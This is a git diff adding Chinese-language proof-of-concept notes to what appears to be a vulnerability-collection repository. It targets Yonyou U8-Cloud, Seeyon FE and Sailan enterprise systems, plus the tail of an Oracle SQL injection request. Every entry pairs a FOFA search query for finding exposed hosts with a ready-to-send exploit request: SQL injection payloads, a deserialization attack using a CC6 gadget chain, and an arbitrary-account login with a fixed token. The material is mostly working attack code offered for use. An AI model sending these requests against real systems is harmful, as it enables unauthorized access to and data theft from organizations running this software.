+GET /ncchr/pm/staff/queryStaffByName?name=1%27+AND+7216%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%287216%3D7216%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29--+hzDZ HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
+Host:
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+
\ No newline at end of file
diff --git a/用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞.md b/用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞.md
new file mode 100644
index 0000000..f748fd2
--- /dev/null
+++ b/用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞.md
@@ -0,0 +1,24 @@
+# 用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞
+
+
+
+## fofa
+
+```yaml
+app="用友-U8-Cloud"
+```
+
+## poc
+
+```
+POST /servlet/ESBInvokerServlet HTTP/1.1
+Host: ip
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Content-Length: 1123
+
+反序列内容
+```
+
+使用使用cc6链生成payload打即可
\ No newline at end of file
diff --git a/致远互联FE协作办公平台apprvaddNew存在sql注入漏洞.md b/致远互联FE协作办公平台apprvaddNew存在sql注入漏洞.md
new file mode 100644
index 0000000..504b79c
--- /dev/null
+++ b/致远互联FE协作办公平台apprvaddNew存在sql注入漏洞.md
@@ -0,0 +1,20 @@
+# 致远互联FE协作办公平台apprvaddNew存在sql注入漏洞
+
+## fofa
+
+```java
+title="FE协作办公平台" || body="li_plugins_download"
+```
+
+## poc
+
+```java
+POST /witapprovemanage/apprvaddNew.j%73p HTTP/1.1
+Host:
+User-Agent:Mozilla/5.0 (WindowsNT10.0;Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)Chrome/96.0.4664.93Safari/537.36
+Content-Type:application/x-www-form-urlencoded
+
+flowid=1';WAITFOR+DELAY+'0:0:5'--+---
+```
+
+
\ No newline at end of file
diff --git a/赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞.md b/赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞.md
new file mode 100644
index 0000000..a53e1c3
--- /dev/null
+++ b/赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞.md
@@ -0,0 +1,20 @@
+# 赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞
+
+赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞,该漏洞可直接登录后台。
+
+## fofa
+
+```java
+body="www.cailsoft.com" || body="赛蓝企业管理系统"
+```
+
+## poc
+
+```
+GET /AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f HTTP/1.1
+Host:
+```
+
+
+
+
\ No newline at end of file